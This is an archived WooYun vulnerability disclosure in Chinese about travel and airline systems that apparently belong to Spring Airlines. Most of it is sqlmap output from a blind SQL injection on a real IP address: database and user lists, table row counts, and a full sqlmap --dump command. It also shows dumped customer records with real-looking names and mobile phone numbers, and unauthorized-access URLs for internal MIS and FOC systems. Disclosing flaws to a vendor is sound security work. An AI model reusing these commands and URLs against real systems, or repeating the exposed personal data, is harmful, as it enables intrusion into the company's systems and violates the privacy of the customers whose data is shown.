乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-11: 厂商已经确认,细节仅向厂商公开 2016-01-21: 细节向核心白帽子及相关领域专家公开 2016-01-31: 细节向普通白帽子公开 2016-02-10: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
RT
1、
http://180.153.27.4:8888/new/route/route_schedule.jsp?u&u=1&q_routeid=42771
注入点: q_routeid 盲注DBA权限、数据库、用户名(从数据库可以看出是春秋的、另外网页中也有显示)
[11:02:39] [INFO] resuming back-end DBMS 'oracle'[11:02:39] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: q_routeid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: u&u=1&q_routeid=42771 AND 4670=4670---[11:02:39] [INFO] the back-end DBMS is Oracleweb application technology: Servlet 2.5, JSP, JSP 2.1back-end DBMS: Oracle[11:02:39] [INFO] testing if current user is DBA[11:02:39] [WARNING] reflective value(s) found and filtering outcurrent user is DBA: Truedatabase management system users [36]:[*] ANONYMOUS[*] APPQOSSYS[*] APPS[*] BI_READ[*] BI_TOUR[*] BTRAVEL[*] CHUNQIU[*] CHUNQIU2[*] CHUNQIU3[*] CHUNQIU4[*] CHUNQIU5[*] CQGUID[*] CRMDB[*] DBSNMP[*] DERBY_HOTEL[*] DIP[*] FINANCE[*] HOTELCOMMENT[*] LOGIN[*] MONITOR[*] MONITOR2[*] MQ[*] MQ2[*] OAG[*] ONLINEDB[*] ORACLE_OCM[*] ORDERDB[*] OUTLN[*] PRODUCTDB[*] SYS[*] SYSTEM[*] TOUR[*] WECHATDB[*] WMSYS[*] XDB[*] XS$NULLavailable databases [28]:[*] APPQOSSYS[*] APPS[*] BTRAVEL[*] CHUNQIU[*] CHUNQIU2[*] CHUNQIU3[*] CHUNQIU4[*] CHUNQIU5[*] CQGUID[*] CRMDB[*] DBSNMP[*] FINANCE[*] HOTELCOMMENT[*] LOGIN[*] MONITOR2[*] MQ[*] MQ2[*] OAG[*] ONLINEDB[*] ORDERDB[*] OUTLN[*] PRODUCTDB[*] SYS[*] SYSTEM[*] TOUR[*] WECHATDB[*] WMSYS[*] XDB
证明危害程度, 跑了部分数据, 东西太多了, 不一一跑了
Database: CHUNQIU (数据量很大)+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| TBC_RP_CHANNEL | 15421067 || TBC_RP_CHANNEL_1007 | 14671619 || RECEPTIONORDERTOURISTLIST | 2715351 || MESSAGEBOARD | 2451570 || F_FTCONTROL_HIS | 2091578 || NETINSCHECKRECORDER | 1929755 || TB_NETINSURANCE | 1880966 || RECE_GROUPSCHEDULE | 1595737 || TB_INSURED | 1552746 || RESOURCE_TRAFFIC_ORDER | 1508648 || DGROUPFLOW | 1435419 || F_FTCONTROL | 1037837 || H_FIRM_GROUP | 735159 || F_HOTELORDERDETAIL | 633021 || RECEPTIONORDER | 608697 || TBC_ROUTE_CHANNEL | 497502 || FLIGHT_SALE | 466494 || RECEP_SCHEDULE | 459895 || TB_CREDIT_CUSTOMER | 453162 || DG01 | 412612 || R_ROUTEPLAN_SCHEDULE | 406140 || R_ORDER_LINE | 398298 || DJ_BRANCH | 374662 || RECE_STANDARD | 350724 || RECEP_SCENE_ARRA | 343802 || RECEP_SCENE_COST | 334070 || MESSAGEBOARD_H1 | 330486 || BAK_ROUTEPLANSCHEDULE | 321128 || TB_CREDIT_LOG | 304121 || RECEP_ORDER_GROUP | 291378 || RECEP_ORDER_GROUP2 | 254828 || RECEP_SPECIALPRICE | 250521 || F_HOTEL_ORDER | 248812 || IM_MESSAGE | 245913 || RECEP_RESTAURANT_COST | 242819 || RECEPGROUPINCOME | 221155 || RECEPTIONGROUP | 210643 || RECEPTIONGROUPINFO | 210448 || USERFUNC | 210024 || RECEP_HOTEL_COST | 200948 || R_ROUTEPLAN_GOAL | 198435 || BAK_ORDER_CHILD_LIST | 186280 || RECEP_HOTEL_ARRA | 182469 || RECEP_RESTAURANT_ARRA | 177022 || RECEP_ORDER_GROUP1 | 175320 || AFFICHE | 172069 || TB_CREDIT | 153068 || INSURANCE | 149259 || BAK_ORDER_HISTORY | 148081 || TBC_FTCONTROL_CHANNEL | 142118 || RECEP_SHOP_ARRA | 137721 || RECEP_SHOP_COST | 130056 || USERROLEFUNC_20141126 | 126942 || USERFUNC_20141125 | 115877 || USERFUNC_20141125_2 | 115877 || USERFUNC_20141125_1 | 115722 || USERFUNC_20141126 | 115722 || USERROLEFUNC | 114598 || USERROLEFUNC_20141125_1 | 110229 || R_ROUTEPLAN | 98140 || R_ROUTEPLAN_STANDARD | 98140 || RECEPGROUPSETTLEMENT | 97145 || RECEPGROUPSETTLEMENT1 | 97145 || RECEP_GROUP | 97021 || RECEP_STANDARD | 94587 || CICERONEARRA | 93077 || USERROLEFUNC_20141125_2 | 90642 || USERROLEFUNC_20141125 | 90640 || BAK_PLANCHILDRENPRICE | 87966 || BAK_ROUTEPLANTRAFFIC | 86578 || D_ROOMFEE_DETAIL | 81832 || R_ORDER_HEAD | 74984 || BAK_ROUTEPLANTRAFFICDETAIL | 74035 || AAA | 72597 || CALL_BOARD_H2 | 70707 || RECEP_MOTO_COST | 68221 || INSURANCE_COSTOMER | 68014 || DY_INGROUP | 66127 || ORDEROPHISTORY | 64132 || TB_CREDITBAK | 58716 || BAK_ROUTEPLAN | 54619 || F_ORDER | 54355 || BAK_ROUTEPLANRECEPTION | 52705 || BAK_ROUTEPLANBRANCH | 52562 || RECEP_OTHER_COST | 50093 || ORDERCOST | 48575 || ROUTEPLAN_UPDATE | 47442 || RECEP_COST_COUNT | 46342 || RECEP_MOTO_ARRA | 40750 || BAK_SIGNORDER | 39427 || TB_SECURITYS | 38921 || ROUTEPLANSCHEDULE | 37394 || F_HOTEL_ROOMTYPE | 37125 || F_HOTEL_ROOMTYPE_BAK | 35109 || CALL_BOARD | 31895 || SCHEDULED_FLIGHT_SALE_REPORT | 31389 || SCHEDULED_FLIGHT_SALE_REPORT2 | 31389 || ORDERTOURISTLIST | 30544 || ORDERTICKET | 29020 || ROUTEPLAN_BUS | 27927 || RECEP_OTHER_ARRA | 27503 || TB_CREDIT_BAK1126 | 24801 || BAK_ORDER_RECERVER | 21593 || F_FTCONTROL_HIS_BACK | 20399 || R_RECEP_GROUP_ARR | 20262 || USERS | 18329 || CHAINED_ROWS | 16906 || USERFUNC_BACK_070313 | 15908 || CALL_BOARD_H | 15846 || USERFUNC_BAK070305 | 15248 || USERS_20141125 | 14920 || USERS_MAPPING_20140928 | 14486 || USERS_BAK | 13880 || RECEP_SHOP | 13779 || BAK_ORDER_GROUP | 11802 || F_HOTELORDERPRICE | 11647 || F_HOTEL | 11119 || OL_R_ORDER_LINE_HIS | 10945 || USERS_MAPPING | 10492 || ROUTESCHEDULE | 10403 || F_HOTELORDERGUEST | 10233 || PLANCHILDRENPRICE | 10204 || D_ROOM_STATE | 9176 || ROUTEPLANTRAFFIC | 8578 || NETINSCHECKREC | 8388 || R_RECEP_GROUP | 8340 || ROUTEPLANTRAFFICDETAIL | 8132 || T_RESOURCE | 8016 || TRAFFICCLASS | 8016 || TRAFFICINFO | 8016 || RRP_RP | 7842 || R_ROUTE_SCHEDULE | 7712 || PERSONNEL | 7297 || F_HOTELORDERHEAD | 7281 || RECEP_HOTEL | 7277 || OL_R_ORDER_PAYMENT | 7008 || RECEP_LOAN_COST | 6857 || ROUTEPLANSCENE | 6853 || ROUTEPLAN | 6762 || SIGNORDER | 6515 || DEPT_FUNC | 6473 || PLANEINFO | 6425 || GROUPSETTLEMENT | 6244 || ROUTEPLANBRANCH | 5959 || ROUTEPLANRECEPTION | 5925 || AGENCY | 5599 || BAK_TRAVELGROUP | 5223 || TBC_ROOMTYPE_CHANNEL | 4519 || DY_TRAINING_EXPERIENCE | 4193 || OL_R_ORDER_HEAD_HIS | 4172 || D_ROOMFEE | 3944 || OL_R_ORDER_LINE | 3841 || USERS_BAK070305 | 3331 || DY_CICERONE | 3220 || ORDER_GROUP | 2980 || R_ORDER_LINE_H | 2941 || R_ROUTE_GOAL | 2936 || ORDERRECEIVERECORD | 2909 || RECEP_RESTAURANT | 2883 || RECEPGROUPCOST | 2844 || D_HOTEL_ROOM | 2241 || ROUTETRAFFIC | 2210 || USER_GROUP | 2206 || HOTEL | 2072 || ROUTETRAFFICDETAIL | 2061 || CHILDRENPRICE | 2056 || ROUTE | 1897 || RECEP_VIHICLE | 1842 || ROUTE_UPDATE | 1811 || R_ROUTE | 1804 || R_ROUTE_STANDARD | 1752 || R_ORDER_HISTORY | 1746 || DY_CICER_GROUP_SEQ | 1689 || USERS_RELATED | 1571 || CITY | 1522 || FUNCITEMS_IN | 1521 || FUNCITEMS | 1448 || OL_R_ORDER_HEAD | 1424 || FUNCITEMS_20141125 | 1415 || ROUTERECEPTIONQUOTE | 1332 || TRAVELGROUP | 1330 || ROUTEBRANCH | 1324 || DEPARTMENTS | 1322 || SCENE | 1319 || TRAININFO | 1300 || SCENE_BAK1126 | 1280 || RESTAURANT | 1172 || TESTQIU | 1169 || CITY_BAK1126 | 1159 || TBC_HOTEL_CHANNEL | 1141 || DEPARTMENTS_20141125 | 1116 || RESTAURANT_BAK1126 | 1102 || ROOMTYPE | 858 || DEPT_MANAGE | 843 || RECEP_SCENE_COST_SUBGROUP | 843 || ROOMFEE | 830 || RECEP_SCENE_ARRA_SUBGROUP | 804 || ROUTEPLANHOTEL | 763 || CUSTOMER | 731 || CICERONEDETAIL | 707 || MOTORTYPE | 706 || DY_RESUMN | 686 || SYSTEMROLES | 675 || SYSTEMROLES_20141125 | 661 || RECEP_RESTAURANT_ARRA_SUBGROUP | 572 || TEMP_5 | 564 || FUNCITEMS_BACK | 544 || FUNCITEMS_BAK070305 | 544 || R_ORDER_HEAD_H | 502 || SETTING | 492 || FUNCITEMS_BACK_070313 | 479 || F_HOTEL_PAY | 469 || TBC_CHANNEL | 446 || SHOP | 441 || SYSTEMROLES_BAK070305 | 440 || SHOP_BAK1126 | 428 || DY_REWARDS_PUNISHMENTS | 398 || BK_TEMP_TABLE_20100818 | 378 || RECEP_RESTAURANT_COST_SUBGROUP | 351 || DY_CICER_TRAINING | 349 || D_ORDER_FAX | 334 || D_ORDER | 315 || D_ORDER_LINE | 297 || RECEPTIONSUBGROUP | 280 || MOTORCADE | 273 || INSURANCE_TYPE | 256 || GROUP_FUNC | 255 || RECEP_SHOP_COST_SUBGROUP | 253 || SMSBOX | 241 || MOTORCADE_BAK1126 | 238 || F_HOTEL_TYPE | 224 || TB_CONTRACT | 221 || NETINSCHECKRECORDER_EXCEPTION | 220 || PERSONNEL_SHMS | 220 || ROUTESCENE | 220 || USERS_SHMS | 220 || COUNTRY | 201 || COUNTRY_IN | 201 || OTHERRESOURCEDETAIL | 200 || SHIPINFO | 199 || OTHERRESOURCE | 176 || BRANCH | 168 || OTHERRESOURCE_BAK1126 | 163 || ROUTETYPE | 153 || FLIGHT_PLAN | 151 || TRAFFICPRICE | 147 || PROVINCE | 136 || DY_CICERTRAIN_SCORE | 133 || TEMP_6 | 127 || TEMP_7 | 126 || TB_DICTIONARY | 123 || RECEP_OTHER_ARRA_SUBGROUP | 120 || TEMP1 | 118 || DY_SETTING | 113 || RECEP_OTHER_COST_SUBGROUP | 104 || BRANCH_20141125 | 102 || RECEP_HOTEL_COST_SUBGROUP | 101 || TB_DICTIONARY_BAK | 97 || FLIGHT_GRADE | 59 || EXCEPTIONRECORD | 56 || RECEP_HOTEL_ARRA_SUBGROUP | 56 || F_HOTEL_PRICE | 50 || DY_TRAINING | 49 || DEPARTMENTS_SHMS | 48 || ROUTEHOTEL | 46 || RECEPGROUPCOSTINFO | 41 || FLIGHT_GRADE_STAND | 35 || PARAMETERS | 34 || BRANCH_DAY_REPORT | 30 || INSURANCE_CANCEL | 30 || RECE_GROUPHOTEL | 29 || RECE_GROUPVEHICLE | 27 || FEETYPE2 | 24 || ORDER_CUST | 23 || RECE_GROUPRESTAURANT | 20 || TBC_ACTION | 19 || RECE_GROUPSHOP | 15 || DY_CICERTEST_SUBJECT | 13 || IM_FRIEND | 12 || RECEP_SHOP_ARRA_SUBGROUP | 12 || F_STAR | 11 || D_RANK_TYPE | 10 || FUNCTYPES | 9 || RECE_GROUPSCENE | 9 || BAOTUANHEAD | 8 || BAOTUANLINE | 8 || H_RECEPTIONGROUP | 8 || TB_CREDIT_SET_LOG | 8 || CONTINENT | 7 || FEETYPE1 | 7 || GROUPS | 7 || QUALITY_SURVEY | 7 || SCHEDULED_FLIGHT_PARAMETER | 6 || INSURANCE_ORG | 5 || NETWORK | 5 || RESOURCETYPE | 5 || TB_CREDITTYPE | 5 || D_PAYMENTTYPE | 4 || T_PORT | 4 || TB_CREDIT_SET | 4 || CLASSINFO | 3 || CUS_TYPE | 3 || D_SALE_RANK | 3 || RESERVEDORDERHEAD | 3 || RESERVEDORDERLINE | 3 || "RECEPTIONORDER#M1" | 2 || IM_ORDER_SETTING | 2 || QUALITY_SURVEY_SUB | 2 || RECEPTIONORDERSETTLEMENT | 2 || ROOMINFO | 2 || TB_CREDIT_USE_LOG | 2 || "RECEPTIONGROUP#M1" | 1 || BASIC_IP | 1 || F_HOTEL_INVENTORY | 1 || RECEPGROUPSETTLEDATE | 1 || ROUTERESTAURANT | 1 || TB_CREDIT_ACCOUNT | 1 || TB_CREDIT_USE | 1 || TEST0627 | 1 || TEST2011 | 1 || TEST2012 | 1 || TOURTYPE | 1 |+--------------------------------+---------+
Database: BTRAVEL+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| BALANCE_ALL_FLIGHTS | 1709032 || BALANCE_ALL | 1219621 || BALANCE_BILL_ALL | 1185535 || BALANCE_ALL_REPORT | 1170999 || T_RECORD_FLIGHTS | 678671 || T_OPERATE_HIS | 644726 || T_RESERVATION_AUTHORIZATION | 562797 || T_RECORD_JOURNEY | 514012 || BALANCE_PNR_HIS | 440229 || BALANCE_OVERMONEY_KIND | 260804 || T_RESERVATION_AIRTICKET | 258835 || T_RESERVATION_JOURNEY | 258425 || T_RESERVATION_SUBORDER | 257952 || T_SUBORDER_PNR | 257952 || T_RESERVATION_ORDER_FINANCE | 255222 || BALANCE_ALL_CUSTOMER | 247060 || T_RESERVATION_PNR | 219529 || T_RESERVATION_MAINORDER | 132687 || BALANCE_BILL | 46929 || T_CUSTOMER_DOCUMENT | 27317 || T_CUSTOMER | 24908 || T_CUSTOMER_CONTACT | 20189 || T_CUSTOMER_CENTER | 18566 || BALANCE_ALL_HIS | 8062 || BALANCE_NET_CUSTOMER | 4481 || BALANCE_NET_ORDER | 3879 || T_BASIC_AIRPORTAREA | 1521 || BALANCE_NET_FLIGHTS | 1034 || BALANCE_CUSTOMER_INFO | 1013 || T_CUSTOMER_COMPANY | 864 || T_CUSTOMER_DEPARTMENT | 741 || BALANCE_DEPT | 583 || T_SUPPOSE_FLIGHT | 570 || T_SUPPOSE_AIRTICKET | 499 || T_SUPPOSE_JOURNEY | 493 || BALANCE_PERSONNEL | 123 || BALANCE_AIRWAYS | 103 || T_DICT_ITEM | 45 || T_CONFIRM_REASON | 30 || BALANCE_TICKETS_TYPE | 25 || BALANCE_CUSTOMER_DEPT | 20 || BALANCE_DEPT_TYPE | 11 || BALANCE_CUSTOMER_GROUP | 10 || BALANCE_KIND | 9 || T_POLICY_REASON | 9 || BALANCE_CUSTOMER_IDTYPE | 5 || BALANCE_TYPE | 3 || T_ACCOUNTING | 3 || BALANCE_FLAG | 2 || T_BALANCE_FINANCE | 2 || T_CUSTOMER_POLICY | 2 || T_DEPARTMENT_POLICY | 2 || T_CUSTOMER_POSITION | 1 || T_POLICY | 1 |+-----------------------------+---------+Database: CRMDB+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| TB_MEMBER_PASSENGER | 7163428 || TB_MEMBER_ABNORMAL | 5633946 || TB_MEMBER_DOCUMENT | 4446875 || TB_MEMBER_BUSINESS_ASSOCIATION | 3866032 || TB_MEMBER_BASIC_INFO | 2233672 || TB_MEMBER_B_ASSOCIATION_T | 665485 || TB_MEMBER_BANDING_CAST | 436288 || TB_MEMBER_LOGIN_TIME | 96638 || TB_MEMBER_GROWTH | 49367 || TB_MEMBER_ADDRESS | 17867 || TB_MEMBER_HEAD | 7091 || TB_MEMBER_GROUP | 402 || TB_MEMBER_OPERATE_LOG | 105 || TB_COMMON_MST | 34 || TB_GROUP_MANAGEMENT | 19 || TB_MEMBER_LABEL | 13 || TB_LABEL_MANAGEMENT | 8 || TB_MEMBER_INSTITUTION | 4 || TB_MEMBER_BLACKLIST_DOCUMENT | 3 || TB_MEMBER_INS_GROUP | 3 || TB_MEMBER_BLACKLIST | 1 || TB_MEMBER_INSTITUTION_BILL | 1 |+--------------------------------+---------+
sqlmap语句:python sqlmap/sqlmap.py -u "http://180.153.27.4:8888/new/route/route_schedule.jsp?u&u=1&q_routeid=42771" --dump --start 1 --stop 3 -T T_CUSTOMER -D BTRAVEL证明一下数据存在(用户、订单数据等)Database: BTRAVELTable: T_CUSTOMER[3 entries]+----+----------+------------+------------+-------------+---------------+------+------+------+-------+--------+-------------+---------+----------+-----------+------------+-------------+-------------+--------------+---------------+-----------------+-------------------+-------------------+| ID | STAFF_ID | COMPANY_ID | CREATOR_ID | MODIFIER_ID | DEPARTMENT_ID | BL | PL | TYPE | STATE | GENDER | NAME_EN | NAME_CN | LOCATION | VERSION | POSITION | BLUE_COLLAR | LOCAL_EXPAT | LEGAL_ENTITY | CREATION_DATE | COST_CENTRE_SAP | MODIFICATION_DATE | EXACT_COST_CENTRE |+----+----------+------------+------------+-------------+---------------+------+------+------+-------+--------+-------------+---------+----------+-----------+------------+-------------+-------------+--------------+---------------+-----------------+-------------------+-------------------+| 2 | NULL | 2009 | NULL | 96708 | 185 | NULL | NULL | 1 | 0 | 1 | MA/XIAOMING | 马晓鸣 | NULL | 2| NULL | NULL | NULL | NULL | NULL | NULL | 07-JAN-11 | NULL || 3 | NULL | 2009 | NULL | 96998 | 164 | NULL | NULL | 1 | 0 | 2 | MA/YIXUAN | 马毅璇 | NULL | 6| NULL | NULL | NULL | NULL | NULL | NULL | 10-MAR-15 | NULL || 4 | NULL | 2009 | NULL | 96297 | 167 | NULL | NULL | 1 | 1 | 1 | MIN/RUI | 闵锐 | NULL | 4 | NULL | NULL | NULL | NULL | NULL | NULL | 16-FEB-12 | NULL |Database: BTRAVELTable: T_CUSTOMER_CONTACT[3 entries]+----+------------+-------------+-------------+-----------+-------------+-------------+--------------+---------------+-------------------+| ID | CREATOR_ID | CUSTOMER_ID | MODIFIER_ID | VERSION | CONTACT_NO | DESCRIPTION | CONTACT_TYPE | CREATION_DATE | MODIFICATION_DATE |+----+------------+-------------+-------------+-----------+-------------+-------------+--------------+---------------+-------------------+| 4 | 30017 | 24356 | 91011 | 2 | 13817835952 | NULL | 2 | 21-JAN-10 | 22-MAR-10 || 6 | 96445 | 27741 | NULL | 1 | 13426415261 | NULL | 2 | 04-MAR-10 | NULL || 7 | 96708 | 28717 | NULL | 1 | 13816977534 | NULL | 2 | 05-MAR-10 | NULL |+----+------------+-------------+-------------+-----------+-------------+-------------+--------------+---------------+-------------------+Database: BTRAVELTable: BALANCE_BILL_ALL[3 entries]+---------+---------+----------+--------------+-----------------+-----------------+-----------------+--------+------------+---------+-----------+------------+--------------+--------------+---------------+---------------+----------------+-------------------+| DEPT_ID | BILL_ID | PLACE_ID | PERSONNEL_ID | TICKETS_TYPE_ID | DISPOSE_USER_ID | RECOVER_USER_ID | IS_USE | BILL_NO | AIRWAYS | USE_DATE | IS_DISPOSE | DISPOSE_DATE | RECOVER_DATE | BILL_INPUT_NO | BILL_TERMINAL | DISPOSE_REMARK | BALANCE_BILL_TYPE |+---------+---------+----------+--------------+-----------------+-----------------+-----------------+--------+------------+---------+-----------+------------+--------------+--------------+---------------+---------------+----------------+-------------------+| 2 | 1586 | NULL | 96578 | 3 | NULL | NULL | Y | 4936008080 | 784 | 17-APR-07 | N | NULL | NULL | NULL | 0 | NULL | NULL || 2 | 1587 | NULL | 96578 | 3 | NULL | NULL | Y | 4936008081 | 784 | 17-APR-07 | N | NULL | NULL | NULL | 0 | NULL | NULL || 2 | 1588 | NULL | 96578 | 3 | 96578 | NULL | Y | 4936008082 | 784 | 17-APR-07 | N | 17-APR-07 | NULL | NULL | 0 | NULL | NULL |+---------+---------+----------+--------------+-----------------+-----------------+-----------------+--------+------------+---------+-----------+------------+--------------+--------------+---------------+---------------+----------------+-------------------+
2、未授权访问mis系统
http://mis.9cair.com/mis2/wp/sopIndex.jsp?taskNo=M05761http://mis.9cair.com/mis2/wp/sopServelt.do?method=showSopPriter&sopSeq=1299通过遍历编号可进一步扩大危害http://mis.9cair.com/mis2/wp/innerindex.jsphttp://mis.9cair.com/mis2/wp/wpServelt.do?method=getStationAndProject&printId=%271%27
foc系统
http://fcs.9cair.com/flyer/alcoholtest/view/index-success.htmlhttp://foc.9cair.com/Frame/Dispatch/weather/weatherMonitor.do 气象地图监控数据
已证明PS:数据太多了, 没有都跑出来, 危害还是比较大的; 若不够, 可以补充的
1、SQL注入, 敏感字符过滤2、未授权访问, 验证权限
危害等级:高
漏洞Rank:12
确认时间:2016-01-11 17:36
谢谢,已收到
暂无